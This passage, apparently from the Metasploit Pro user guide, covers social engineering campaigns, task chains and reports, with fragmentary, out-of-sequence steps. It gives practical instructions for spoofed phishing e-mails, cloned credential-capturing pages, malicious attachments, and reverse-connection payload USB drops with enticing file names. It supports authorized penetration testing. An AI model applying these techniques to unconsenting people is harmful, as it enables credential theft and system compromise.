HTML Editor - The HTML editor is an editing interface that you use to create the content for an e-mail template. It includes a built-in toolbar for text formatting, which makes it possible for you to create e-mail content without any HTML knowledge.
Text Editor - The text editor is an editing interface that you use to create the content for an e-mail template. Unlike the HTML editor, it does not include a formatting toolbar. Instead, you must have prior knowledge of HTML to create e-mail content.
5. Click the Insert Custom Attribute dropdown, and select the E-mail Content attribute.
6. Under the {{email_content}} attribute, enter the e-mail body for the template.
7. When you finish creating the e-mail content, click the Save button.
Malicious Files
A malicious file refers to a custom, user-supplied file that you can use in a campaign to exploit a target machine. Examples of a malicious file include custom written scripts, executables, or payloads. To deliver a malicious file to a human target, you must first upload the file to the project. Once the malicious file is uploaded, you can use either an e-mail or a web page to deliver the malicious file to the human target. Each of these campaign components provides an option to attach a user-supplied file to it.
11. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to.
12. From the Attack type dropdown, choose the Attach file option.
13. In the Attachment file name field, enter the name of the malicious file you want to deliver to a human target. The file name must include the file extension. For example, if you are attaching a PDF, the file name should include the PDF extension.
14. From the File generation type options, choose User supplied file.
15. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use.
16. Click the Next button to create the e-mail body.
17. After you create the e-mail body, click the Save button to close the e-mail configuration window.
18. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window.
19. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
10. From the File generation type options, choose the User supplied file option.
11. From the Choose a file dropdown, select the malicious file that you want to attach to the e-mail. Please remember that you must upload the malicious file before you can access it through a campaign component. If the file that you want to use has not been uploaded, you can choose the Upload a new file option to upload the file that you want to use.
12. Click the Next button to create the web page content.
13. After you create the web page content, click the Save button to close the web page configuration window.
14. From the campaign configuration page, click the Web Server button.
15. When the web server configuration window appears, select the host name that you want to use to host the web page.
16. In the Listening Port field, enter a port that is commonly used for HTTP traffic, such as port 80 or 8080.
17. Click the Save button to save your changes and to close the web server configuration window.
18. Now that you are back on the campaign configuration page, you need to create an e-mail to deliver the web page URL to the human targets.
19. From the Campaign Components area, click the Add e-mail, web page, portable file button.
20. Click the E-mail button.
21. When the e-mail configuration window appears, enter a name for the e-mail component in the Component name field. This is the name that displays for the component on the campaign configuration page.
22. In the Subject field, enter a subject for the e-mail.
23. In the From address field, enter the e-mail address that the campaign is trying to spoof.
24. In the From name field, enter the name of the person that the spoofed e-mail should appear to be from.
25. From the Choose a Target List dropdown, select the target list that you want to send the e-mail to.
26. From the Attack type dropdown, choose None.
27. Click the Next button to create the e-mail body.
28. After you create the e-mail body, click the Save button to close the e-mail configuration window.
29. From the campaign configuration page, click the E-mail Server button. If you have a global SMTP server set up, you can go ahead and click the Save button to validate and save the server settings. If you do not have a global SMTP server configured, you will need to provide the SMTP settings for your mail server.
30. After you define the SMTP settings, you can click Save to validate the server settings and to close the e-mail server configuration window.
31. When the campaign configuration page appears, click the Save button to save the campaign or click the Launch Campaign button to start the campaign.
Executable Files
An executable is a portable file that delivers the embedded generic multi-handler payload to a victim's machine. The payload creates a reverse connection over HTTPS from the victim's machine to the multi-handler listener that is running from a campaign. When the multi-handler listener receives the incoming connection, it delivers the remaining payload to the victim's machine. After a connection has been established between the two machines, you can take control of the session to gain further access into the network or to gather information from the victim's machine. To set up the handler, you need to specify the listener port, or LPORT. Metasploit Pro uses the LPORT that you assign and the local Metasploit instance as the callback IP address to configure the handler.
8. In the Generated file name field, enter a name for the executable file. This is the file name that the human target sees when they look at the contents of the USB drive. You want to give the file a name that entices the user to click on it. For example, a name like Payroll or Company Bonuses may work well.
9. In the Listener Host field, enter the callback IP address that you want the payload to use. By default, the callback IP is the address of your Metasploit server.
10. In the Listener Port field, enter the callback port that you want the payload to use. By default, the callback port is 1024.
11. Select the Payload type for the executable file.
12. Verify that Executable file is selected as the File generation type.
13. Save the executable.
14. When the Configure a Campaign area reappears, you will see a Download link located beneath the USB Key icon. Click the Download link and save the executable file to a location on your local machine. The Desktop or Downloads folder is a good location.
15. Click the Launch Campaign button to start the campaign. The campaign must be online in order for you to get a session on the human target's system.
16. Insert your USB key into your USB port and move the executable over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic volume or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms. This increases the chances of someone finding the USB key and installing it on their system. If you are able to successfully create a backdoor on the victim's machine, you can use it to pivot to other machines on the network and collect information from the victim.
14. When the campaign configuration area reappears, you will see a Download link located below the campaign component icon. Click the Download link and save the file to a location on your local machine. The Desktop or Downloads folder is a good location.
15. When you are ready to start the campaign, click the Launch Campaign button. The campaign must be online in order for you to get a session on the human target's system.
16. Insert your USB key into your computer and move the file over to your USB drive. The USB key is now ready for you to drop off. You should select an area that has high traffic or a location where people are more likely to set things down and forget them, such as bathrooms, copy rooms, and break rooms.
Phishing Campaigns
Phishing is a social engineering technique that attempts to acquire sensitive information from a human target. During a phishing attack, a human target receives an e-mail disguised as an e-mail from a trusted source. The spoofed e-mail contains a tracking link that opens an authentic-looking web page, which contains a web form that you want the human target to fill out. If the human target fills out and submits the form, you can capture their information and use it as evidence. Phishing is a good way for you to test the following:
Whether the security perimeter, e-mail infrastructure, and client-side safety measures prevent unauthorized access and malicious activity.
Whether the security awareness and training programs effectively teach employees how to identify and prevent a phishing attack.
Set up the global SMTP settings - To access the global settings, select Administration > Global Settings from the main menu. Find the SMTP settings and enter the information for your SMTP server.
Verify that your local machine can reach the Internet - Metasploit Pro must be able to access the Internet in order to clone a web page.
Create or import target lists - The target list defines the e-mail addresses of the human targets that you want to send the phishing e-mail. You can create the target list from within the Phishing Wizard, but it is recommended that you set up your target lists before you create a campaign.
Redirect to URL - Redirects the human target to a real web page. For example, you can redirect the human target back to the company's website or intranet.
Campaign Redirect Page - Uses the redirect page that you create as part of the campaign.
4. Click the Next button to continue to the Web Page Content window.
5. When the Web Page Content window appears, choose one of the following options to add HTML to the web page:
Create custom HTML - To create a custom web page, use the content editor to write the HTML for the web page.
Clone an existing website - This is the recommended method. To clone a website, click the Clone Website button. When the Clone Website modal window appears, enter the web page that you want to clone. The web page that you want to clone must contain some sort of web form.
Subject - The subject that displays in the message header and the subject line.
From Address - The sender's e-mail address.
From Name - The sender's name.
3. Click the Target list dropdown and choose a target list.
4. Click Next to continue to the E-mail Content window.
5. When the E-mail Content window appears, you need to create the body for the e-mail. Use the plain text or rich text editor to create the e-mail body.
6. After you create the content, you need to add a link to the landing page. To do this, either highlight the text in the e-mail content that you want to use as the display text or place your cursor at the insertion point where you want the URL to appear in the e-mail.
7. Click the Insert Custom Attribute dropdown and select Link to Landing Page.
8. When the Insert a Landing Page window appears, enter the text that you want to display in the e-mail and click Insert. The link will appear as {% campaign_web_link 'DISPLAY TEXT', 'Landing' %} in the E-mail Content window.
9. Click Save to save the e-mail component.
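The custom attributes described under Creating an E-mail (such as first_name), the {{ email_content }} tag from E-mail Templates, and the {% campaign_web_link %} tag above all fit together at render time: each target list row fills the body, the body is wrapped in the template, and the link tag becomes an anchor to the landing web page. The following is an added example, not Metasploit Pro's own template engine (whose syntax only resembles the Liquid-style tags shown), that models that flow from the guide's description. The CSV rows, template, body, host names and landing URL are all constructed for the example.

```python
import csv
import io
import re
from html import escape
from typing import Dict, List

ATTR_RE = re.compile(r"\{\{\s*(\w+)\s*\}\}")
LINK_RE = re.compile(r"\{%\s*campaign_web_link\s+'([^']*)'\s*,\s*'([^']*)'\s*%\}")
REQUIRED_COLUMNS = ("email", "first_name", "last_name")

# Constructed target list in the CSV layout the guide describes; the
# addresses and names are invented for the example.
TARGET_CSV = """email,first_name,last_name
alice@testlab.example,Alice,Ng
bob@testlab.example,Bob,Reyes
"""

# Constructed e-mail template (reusable wrapper) and e-mail body.
EMAIL_TEMPLATE = (
    '<html><body><img src="https://intranet.testlab.example/logo.png" alt="logo">'
    "{{ email_content }}"
    "<p>IT Helpdesk</p></body></html>"
)
EMAIL_BODY = (
    "<p>Hi {{ first_name }} {{ last_name }},</p>"
    "<p>Please review {% campaign_web_link 'your account settings', 'Landing' %} today.</p>"
)


def load_targets(csv_text: str) -> List[Dict[str, str]]:
    """Parse a target list CSV, requiring the e-mail, first and last name columns."""
    reader = csv.DictReader(io.StringIO(csv_text))
    missing = [c for c in REQUIRED_COLUMNS if c not in (reader.fieldnames or [])]
    if missing:
        raise ValueError(f"target list is missing columns: {missing}")
    return [{k: (v or "").strip() for k, v in row.items()} for row in reader]


def render_attributes(text: str, values: Dict[str, str]) -> str:
    """Replace {{ attribute }} tags. An unknown attribute is an error rather
    than silently rendering as empty text, so typos surface before sending."""
    def sub(match):
        name = match.group(1)
        if name not in values:
            raise ValueError(f"unknown custom attribute: {name}")
        return values[name]
    return ATTR_RE.sub(sub, text)


def render_links(text: str, pages: Dict[str, str]) -> str:
    """Replace {% campaign_web_link 'text', 'page' %} with an anchor to the
    URL of the named web page component."""
    def sub(match):
        display, page = match.group(1), match.group(2)
        if page not in pages:
            raise ValueError(f"no web page component named {page!r}")
        return f'<a href="{escape(pages[page], quote=True)}">{escape(display)}</a>'
    return LINK_RE.sub(sub, text)


def render_email(body: str, template: str, target: Dict[str, str], pages: Dict[str, str]) -> str:
    """Fill the body from one target's attributes, then wrap it in the template."""
    # Imported CSV cells are untrusted input: escape them so a cell cannot
    # inject markup into the message.
    safe = {k: escape(v) for k, v in target.items()}
    content = render_links(render_attributes(body, safe), pages)
    return render_attributes(template, {"email_content": content})


def render_campaign(csv_text: str, body: str, template: str, pages: Dict[str, str]) -> Dict[str, str]:
    """Return {recipient e-mail: rendered HTML} for every target in the list."""
    return {t["email"]: render_email(body, template, t, pages) for t in load_targets(csv_text)}


if __name__ == "__main__":
    # The landing page URL is the campaign web server address plus the web page path.
    rendered = render_campaign(TARGET_CSV, EMAIL_BODY, EMAIL_TEMPLATE,
                               {"Landing": "http://www.mycompany.example/support"})
    for recipient, html in rendered.items():
        print(recipient, "->", html)
```

The escaping step is the part worth keeping in mind when you import a target list from elsewhere: the names come from a CSV you did not necessarily write, and they land inside HTML that your own mail server sends.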
• This server's IP address - Uses the IP address of the local machine.
• This server's host name - Uses the host name of the local machine.
• Custom - Uses the domain name, if DNS is set up and is reachable by the Metasploit instance.
3. In the Listening Port field, enter the port that you want to use to run the web server. You should specify a port that is typically used for HTTP traffic, such as 80 or 8080.
4. Click Save to save the web server settings.
• Host - The fully qualified mail server address (e.g., mail.domain.com).
• Port - The port that SMTP runs on. Typically, SMTP runs on port 25.
• Username - The user name that the system uses to authenticate to the mail server.
• Password - The password that the system uses to authenticate to the mail server.
3. When the Notification Settings window appears, enter the e-mail addresses of the people you want to send the alert to in the To field.
4. In the Subject field, enter the subject that you want the e-mail to display. By default, Metasploit Pro auto-fills the subject for you with a canned subject line.
5. In the Message field, enter the information, or body, that you want to send in the e-mail. For example, you may want to say something like: This is a company wide alert to inform you that we are starting our security awareness program. If you have any questions, please contact John Smith.
6. When you are done creating the notification e-mail, click the Save button.
Saving a Campaign
When you finish configuring the campaign components, you need to save the campaign.
From the project that contains your campaign, select the Sessions tab from the Tasks bar. You will see a list of open sessions under the Active Sessions area. Click on any session ID to view the actions that you can take against the victims system.
Cleaning Up Sessions
A session clean up closes the connection between the attacking machine and the victim and removes any artifacts from Metasploit Pro. You need to perform a session clean up to close sessions that you no longer need to access.
1. From the project that contains your campaign, select the Sessions tab from the Tasks bar. A list of open sessions appears under the Active Sessions area.
2. Select the sessions that you want to close and click the Clean Up button.
• A statistical overview of the campaign findings.
• Actions taken by the human targets in a campaign.
• Statistical analysis of human target behavior and easy identification of high risk targets.
• Browser and operating systems used by human targets in a phishing attack.
• Raw data from the components used to create a campaign.
• Any exploits that were used in the campaign and any sessions that were obtained from compromised systems.
• Remediation steps that can be implemented or can be recommended to reduce the threat of social engineering attacks across an organization.
Section                         Included by Default
Cover Page                      X
Executive Summary               X
Social Engineering Funnel       X
Exploits Used                   X
Form Submissions                X
Browser/Platform Information    X
Appendix: Host Details          X
Section
Appendix: Human Targets
Appendix: E-mails
Appendix: Web Pages
Appendix: Portable Files
Appendix: Remediation Advice
Appendix: Notes
Included by Default
X X
Sample report sections: Cover Page, Executive Summary, Exploits Used, Form Submissions, Remediation Advice, Report Notes.
1. From within a project, click the Reports tab.
2. Click the Standard Report button.
3. When the New Report form appears, click the Report type dropdown and choose Social Engineering Campaign Details Report.
4. From the SE Campaign Detail Report Format options, choose the format you want to use to generate the report. The most common format is PDF.
5. In the Name field, enter the name that you want to assign to the report. This is the name that displays on the Reports page in Metasploit Pro and the name that the system uses to save the report. You can choose to use the default naming convention, which uses the report type as the report name and appends the task number to it.
6. Click the Campaign dropdown menu and choose the campaign that you want to generate a report for.
7. From the Report Sections options, deselect any report sections that you do not want to include in the report. By default, all sections are included; however, if the campaign does not have any data for a particular section, the section will be empty in the report.
Note: If your campaign does not use an exploit or deliver a payload to the human target, your report will not show any data for the Exploits Used section or display any values for the % of systems exploited and compromised in the Social Engineering Funnel.
8. Select the Include web page HTML option if you want to include the raw HTML code for all the web page components that are part of the campaign.
9. If you want to e-mail the generated report, you can select the E-mail report option and enter a comma separated list of the e-mail addresses that you want to send the report to.
Note: If you choose to e-mail the report, please make sure that you have the SMTP settings configured through the Global Settings.
10. Click the Generate button to create the report. The Task Log appears and shows you the progress of the report generation.
11. When the report generation is complete, click the Reports tab to view a list of reports stored in the project.
12. Find the report you just generated. You can either view the report directly through your browser or you can download the report and save it to a location on your system.
Chapter 18: Task Chains
About Task Chains
Creating, Scheduling, and Running Task Chains
Managing and Editing Task Chains
• Task chains list - Displays all the task chains that are stored in the project. From this list, you can bulk manage task chains, view the current status for a task chain, view the contents of the task chain, and identify when a task chain will run next.
• Task chain configuration page - Displays the contents of a task chain. From this page, you can add, configure, and rearrange tasks, and you can create the schedule for the task chain.
• Create a new task chain
• Delete task chains
• Clone task chains
• Suspend task chains
• Run task chains
• View the current status for a task chain
• View the last time the task chain was run
• View the tasks that comprise a task chain
To access the task chains list, select Tasks > Chains from the Project tab bar.
1. New Task Chain button - Opens the New Task Chain configuration page.
2. Task chain bulk management buttons - Bulk manages task chains. You can do things like delete, clone, suspend, and run multiple task chains at once.
3. Task chains list - Lists all of the task chains that have been created for the project. Each task chain will have one of the following schedule icons:
• Recurring Schedule - Indicates that the task chain repeatedly runs at a specified time and day.
• Single Schedule - Indicates that the task chain is scheduled to run once at a specified time and date.
• Not Scheduled - Indicates that the task chain does not follow a schedule.
• Suspended - Indicates that the task chain is inactive.
4. Task chain status - Displays one of the following statuses for each task chain:
• Never run - The task chain has never run.
• Running - The task chain is currently running.
• Last run - The task chain last ran successfully at the specified date.
• Failed - The task chain was unable to finish successfully. If the task chain failed, it will display a link that you can click on to open the Task log and view the errors that occurred.
1. Task Chain Name field - Displays an editable field for the task chain name. You can click on the field at any time to edit its name.
2. Schedule status - Indicates whether or not a schedule has been created for the task chain. It displays one of the following statuses:
• Scheduled - Indicates that a schedule has been created for the task chain.
• Unscheduled - Indicates that a schedule has not been created for the task chain.
3. Schedule Now link - Opens the Task Chain Scheduler, which enables you to schedule and suspend task chains. Additionally, you can enable the option to clear project data before the task chain runs.
4. Save and Run button - Saves the current task chain configuration and immediately runs the task chain.
5. Save button - Saves the current task chain configuration. The task chain will be available for you to run on demand or it will run according to the schedule that you have created for it.
6. Delete task - Removes the selected task from the task chain.
7. Clone task - Duplicates the selected task and adds it to the end of the task chain.
8. Reset task configuration - Clears all tasks from the task chain.
9. Task bubble - Represents a task. You can click on a task bubble to open the task configuration form. The selected task bubble will be highlighted in blue. Any task highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form. You can also click and drag the task bubble to move the task to a new position in the task chain.
10. Add Task button - Displays the task list and enables you to select the task that you want to add to the task chain.
11. Task configuration form - Displays the options that you can configure for the task that is selected. Options will vary depending on the task that is selected.
Supported Tasks
Task chains can be used to execute the following tasks:
• Discovery scan - Enumerate and fingerprint hosts on a target network.
• Import - Bring in data from supported third-party scanners, such as Nexpose and Nessus.
• Vulnerability scan - Scan a target network with Nexpose to find vulnerabilities on a target network.
• Web scan - Scan web forms and applications to find and exploit active content and forms.
• Bruteforce - Systematically attempt various combinations of letters, numbers, and characters to crack credentials.
• Auto-exploitation - Automatically build an attack plan by cross-referencing open ports, imported vulnerabilities, and fingerprint information to exploit modules.
• Single module run - Launch a module to perform targeted attacks against hosts or to gather additional data about hosts. You can add multiple modules to a task chain.
• MetaModules run - Launch one of the following MetaModules: the Single Password Testing MetaModule, the Known Credentials MetaModule, the SSH Key Testing MetaModule, the Pass the Hash MetaModule, the Firewall Egress Testing MetaModule, or the Passive Network Discovery MetaModule.
• Evidence collection - Collect evidence, such as screenshots, password hashes, and system files, from compromised hosts.
• Session clean up - Close any open sessions on compromised hosts.
• Report generation - Create a report to document findings and share test results.
The New Task Chain page appears.
3. Enter a name for the task chain in the Task Chain Name field.
A new task bubble appears on the task chain and the task configuration page displays below the task chain.
6. Configure the task as you usually would. The steps for configuring a task vary based on task type. For more information on configuring a specific task, see one of the following topics:
• Running a Discovery Scan on page 135
• Importing Scan Data on page 150
• Running a Nexpose Scan on page 205
• Running a Bruteforce Attack on page 226
• Running a Module on page 119
• Running Automated Exploits on page 238
After you configure the task, you can add additional tasks to the task chain. When you finish building the task chain, you can create a schedule for the task chain or you can save the task chain to run on demand.
For more information on scheduling a task chain, see Task Chain Schedules on page 427.
When you click the '+' button, the task list appears and shows you the tasks that can be added to the task chain.
After you add the task, a new task bubble appears on the task chain, and the task configuration form displays below the task chain.
The task bubble displays the task's position in the task chain. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth. You can click the task bubble and drag it to reposition it in the task chain. Any task bubble highlighted in red indicates that the task has not been configured correctly and the task chain cannot be saved. You can click on the task to fix the issues on the task form.
Cloning a Task
When you clone a task, you are adding a copy of the task to the end of the task chain. You can move or modify the task as needed.
Note: You should only clone tasks that are highlighted in blue, which indicates that there are no errors in the task configuration.
To clone a task, click the task you want to clone to select it.
Then, click the Clone button located in the task chain tool bar.
The cloned task will be added to the end of the task chain.
If you need to reposition the task in the task chain, click on the task and drag it to the position you want it to appear in the task chain.
After you reposition the task, the position that displays in the task bubble is updated. A task in the first position displays a number '1', a task in the second position displays a number '2', and so forth.
Then, click the Delete button located in the task chain toolbar.
A dialog window will appear and prompt you to confirm that you want to delete the task. Click OK to delete the task from the task chain. You can only remove one task at a time. If you need to remove multiple tasks, please repeat the steps listed above or reset the task chain. For more information on resetting the task chain, see Resetting a
Any and all data stored in the project, including hosts, collected evidence, session information, reports, and credentials will be wiped from the project. Enable this option only if you want to start the task chain with an empty project. Data cannot be recovered after it has been cleared from the project.
A dialog window will appear and prompt you to confirm that you want to reset the task chain. Click OK to reset it.
A dialog window will appear and prompt you to confirm that you want to run the task chain. Click OK to run it.
When the task chain configuration page opens, you can do things like add, clone, and remove tasks; tweak settings for a particular task; and update the schedule for the task chain.
The task chain configuration form appears. The form retains the configuration settings that you used to create the original task chain. You can run the task chain as is, or you can modify its settings. The cloned task chain will use the following naming convention: [task-chain-name]-timestamp.
When the Task Chains list appears, select the task chain whose schedule you want to suspend. The task chain that you select must be scheduled and in an unsuspended state. These task chains will have a scheduled icon located next to them. Note: If you need to bulk suspend task chains, you can select multiple task chains.
To unsuspend a task chain, select it and click the Unsuspend button. The task chain you selected must be in a suspended state.
When the task chain configuration page opens, click on the Schedule Now link to open the scheduler.
The scheduler will display the current schedule. You can use the scheduler to update the existing settings.
Any data that was collected before you stopped the tasks will still be stored in the project.
The Tasks Log appears and shows you the status and activity for the task.
Schedule Options
There are a few different schedule options that you can use to control when a task chain runs. The following schedule options are available:
• Once - Runs the task chain once on a specific date. For example, you may want to choose this option if you want to run the task chain once at midnight on December 15, 2014.
• Hourly - Runs the task chain every hour. For example, you may want to choose this option if you want to run the task chain at half past every hour.
• Daily - Runs the task chain every day. For example, you may want to choose this option if you want to run the task chain every day at midnight.
• Weekly - Runs the task chain on certain days of the week. For example, you may want to choose this option if you want to run the task chain every Monday and Wednesday at midnight.
• Monthly - Runs the task chain on a specific day of the month. For example, you may want to choose this option if you want to run the task chain on the last day of each month.
Scheduling a Task Chain
1. From within the project that contains the task chain you want to schedule, select Tasks > Chains from the Project tab bar.
2. Find and open the task chain you want to schedule. The configuration form for the task chain opens.
3. Click the Schedule Now link. The scheduler appears.
4. Click the Run Chain dropdown to display the recurrence options. You can choose once, hourly, daily, weekly, or monthly. The options that appear depend on the recurrence option you have selected.
For example, if you want to run the task chain daily, you will need to specify if the task chain should run every day, every 2 days, every 3 days, and so on. You must also indicate the date and time you want the task chain to start.
5. Click the Max Duration dropdown and choose a time limit for the task chain. (Optional)
6. Click the Done button to save the schedule. The scheduler closes and the task chain configuration page appears.
7. Save the task chain. The task chain will run according to the date and time you have scheduled.
Suspending a Schedule
You can indefinitely suspend a schedule from the Scheduler or from the Task Chains List. When you suspend a task chain, it will not run again until you re-enable the schedule or manually run it yourself. To suspend the schedule, select the Suspend option located on the Scheduler.
To unsuspend the schedule, deselect the Suspend option located on the Scheduler.
If you do not want to set a time limit on the task chain, you can set the maximum duration to Never Expire.
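The recurrence options above and the Max Duration limit, as an added example that is not Metasploit Pro code: a small next-run calculator that models Once, Hourly, Daily with an "every N days" interval, Weekly on chosen weekdays, Monthly including "last day of the month", the Suspend state, and Max Duration versus Never Expire. The Schedule fields, the function names and the sample dates are assumptions of this example.

```python
"""Next-run calculator for the task chain schedule options described above.

Added example, not Metasploit Pro code: the Schedule fields, function names
and sample dates below are assumptions made for illustration.
"""
from __future__ import annotations

import calendar
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

MONDAY, WEDNESDAY = 0, 2  # datetime.weekday() numbering, Monday == 0


@dataclass
class Schedule:
    recurrence: str                           # "once", "hourly", "daily", "weekly", "monthly"
    start: datetime                           # date and time of the first run
    interval: int = 1                         # daily: run every N days
    weekdays: list[int] = field(default_factory=list)  # weekly: weekday() values
    day_of_month: Optional[int] = None        # monthly: 1..31, None = last day of the month
    max_duration: Optional[timedelta] = None  # None = Never Expire
    suspended: bool = False


def _advance(start: datetime, step: timedelta, after: datetime) -> datetime:
    """First time in the series start, start+step, ... that is strictly after `after`."""
    if start > after:
        return start
    return start + ((after - start) // step + 1) * step


def next_run(s: Schedule, after: datetime) -> Optional[datetime]:
    """Return the first scheduled run strictly after `after`, or None if the chain will not run."""
    if s.suspended:
        return None  # a suspended chain waits until it is unsuspended or run manually
    if s.recurrence == "once":
        return s.start if s.start > after else None
    if s.recurrence == "hourly":
        return _advance(s.start, timedelta(hours=1), after)
    if s.recurrence == "daily":
        return _advance(s.start, timedelta(days=max(1, s.interval)), after)
    if s.recurrence == "weekly":
        if not s.weekdays:
            raise ValueError("weekly schedule needs at least one weekday")
        candidate = s.start
        if candidate <= after:  # jump close to `after`, keeping the start time of day
            candidate += timedelta(days=(after - s.start).days)
        while candidate <= after or candidate.weekday() not in s.weekdays:
            candidate += timedelta(days=1)
        return candidate
    if s.recurrence == "monthly":
        year, month = s.start.year, s.start.month
        while True:
            last = calendar.monthrange(year, month)[1]  # handles February and 30-day months
            day = last if s.day_of_month is None else min(s.day_of_month, last)
            candidate = s.start.replace(year=year, month=month, day=day)
            if candidate > after and candidate >= s.start:
                return candidate
            year, month = (year + 1, 1) if month == 12 else (year, month + 1)
    raise ValueError(f"unknown recurrence {s.recurrence!r}")


def run_deadline(s: Schedule, started: datetime) -> Optional[datetime]:
    """When a run that began at `started` is cut off by Max Duration (None = Never Expire)."""
    return None if s.max_duration is None else started + s.max_duration


def demo() -> dict[str, Optional[str]]:
    """Constructed sample schedules; returns ISO timestamps so the results are easy to check."""
    def iso(t: Optional[datetime]) -> Optional[str]:
        return None if t is None else t.isoformat()

    once = Schedule("once", datetime(2014, 12, 15, 0, 0))                # midnight, Dec 15 2014
    hourly = Schedule("hourly", datetime(2014, 12, 15, 0, 30))           # half past every hour
    daily = Schedule("daily", datetime(2014, 12, 15, 0, 0), interval=2)  # every 2 days
    weekly = Schedule("weekly", datetime(2014, 12, 15, 0, 0), weekdays=[MONDAY, WEDNESDAY])
    monthly = Schedule("monthly", datetime(2015, 1, 31, 0, 0), max_duration=timedelta(hours=2))
    return {
        "once_pending": iso(next_run(once, datetime(2014, 12, 1))),
        "once_done": iso(next_run(once, datetime(2014, 12, 16))),
        "hourly": iso(next_run(hourly, datetime(2014, 12, 15, 13, 45))),
        "daily": iso(next_run(daily, datetime(2014, 12, 16, 12, 0))),
        "weekly": iso(next_run(weekly, datetime(2014, 12, 15, 0, 0))),
        "monthly_feb": iso(next_run(monthly, datetime(2015, 2, 1))),
        "deadline": iso(run_deadline(monthly, datetime(2015, 2, 28, 0, 0))),
        "suspended": iso(next_run(Schedule("daily", datetime(2014, 12, 15), suspended=True),
                                  datetime(2014, 12, 1))),
    }
```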
Chapter 19: Reports
A report takes a snapshot of the data in a project at a particular moment in time and compiles the results into a tangible output format. You create a report to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so that they can quickly prioritize, reproduce, and remediate their vulnerabilities. Most of the time, you will generate a report to create a distributable document that presents both high-level statistics and detailed critical findings. Whether someone wants an at-a-glance summary or needs the technical details of your penetration test, the report will be able to cater to both ends of the viewer spectrum. To work with reports, you will need to use the Metasploit Pro web interface, which provides you with robust and comprehensive reporting capabilities. To learn more about reports, read the following topics:
• About Reports on page 433
• Metasploit Report Types on page 1
• Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports on page 1
• Customizing Standard Reports on page 454
• Working with Custom Templates on page 461
About Reports
A report takes a snapshot of the data in a project at a particular moment in time. It enables you to compile data from a project so that you can present it in a tangible output format. You create reports to document your testing methodology, disclose your findings, and support your findings with real evidence. A report enables you to share this information with an organization so they can prioritize, reproduce, and remediate their vulnerabilities. By understanding the results of a penetration test, an organization can learn how they can mitigate weaknesses in their security infrastructure.
• PDF - A document that can be opened and viewed with Adobe Reader. This is the default type.
• HTML - A file that can be opened and viewed in a Web browser.
• RTF - A document that uses text-based encoding, which enables its content to be viewed in most major word processing applications. You can use this format if you want to edit or annotate the report or if you need to distribute the report across multiple platforms.
• Word - A document that can be opened, viewed, and edited in Microsoft Word. You can use this format if you want to edit or annotate the report.
You can generate any combination of output formats for each report. Each instance will be an artifact of the report.
What Are Report Artifacts?
An artifact refers to the output formats that have been generated for a report. For example, a PDF and RTF version of the same Social Engineering Report are artifacts of the report. To view the artifacts for a report, select Reports > Show reports from the Project tab bar. The Reports List shows all the reports that have been generated for the project and displays the artifacts for each report in the File Formats column.
Reports Directory
When Metasploit Pro generates a report, it stores a copy of the file in /path/to/Metasploit/apps/pro/reports/artifacts. The files that are stored in this directory will match the list of reports displayed in the web interface. You can go to the reports directory to download or view reports; however, you should not make any changes directly to the default reports directory. If you need to modify the reports, you should make a copy of the reports directory and make your changes from the new directory. Any changes that you make directly to the reports can cause disparities between the metadata that displays for the file in the web interface and the file itself. If you need to remove reports from a project, you should do it from within the web interface. Do not delete them directly from the reports directory.
Report Logs
The report log maintains a historical record of all report-related events. Metasploit Pro automatically updates the report log each time you generate a report. If you experience any issues with a report, you can view the report log to find stack trace errors and troubleshoot them.
1. Report Type - Choose from one of the following report types: Activity, Audit, Authentication Tokens, Collected Evidence, Compromised and Vulnerable Hosts, FISMA Compliance, PCI Compliance, Services, Social Engineering, and Web Application Assessment.
2. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word.
3. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report.
4. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report.
5. Cover Logo - Specify the logo that you want to add to the cover page of the report.
6. Sections - Choose the sections you want to include in the report. By default, all report sections are selected. The report sections that are available vary between report types. The form automatically displays the sections that are supported for the report type that is currently selected.
7. Options - Use these options to manage confidential data and graphics in a report. The report form displays the options that are applicable for the report type selected. The following options may be available for each report:
• Mask discovered credentials - Removes all credentials, including plain text passwords, hashes, and SSH keys, from a report. The report displays the user name and a blank password.
• Include session details - Shows the details for each session Metasploit Pro was able to open, such as the session type and attack module that Metasploit Pro used to obtain the session.
• Include charts and graphs - Includes visual aids, such as pie graphs, to accompany statistical findings in a report.
• Include web page HTML (in addition to image preview) - Includes a preview of the web pages used in the social engineering campaign. (Social Engineering Campaign Details Report only)
8. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
1. Custom Report Collateral - Upload Jasper templates and logos that can be used for customizing reports. Supported collateral types include Jasper report templates and image files, such as JPEG, PNG, and GIF.
2. Custom Report Template - Select the template that you want to use to create your report.
3. File Format - Select the output format you want to use to generate the report. The form automatically displays the output formats that are supported for the report type that is currently selected. All reports support PDF, RTF, and HTML. Some reports, like the Web Application Assessment Report, do not support Word.
4. Name - Specify the name that you want to save the report as. This is the report name you will see when you view the Reports List or when you download the report.
5. Address Settings - Use the Included addresses field to create a white list or use the Excluded addresses field to create a black list. A white list explicitly defines the hosts you want to include in the generated report. A black list, on the other hand, explicitly defines the hosts you want to exclude from the report.
6. Cover Logo - Specify the logo that you want to apply to the report.
7. Email Report - Automatically sends the finished report to a list of comma separated or semi-colon separated e-mail addresses.
Activity Report
Description: Generates a human readable version of the activity log.
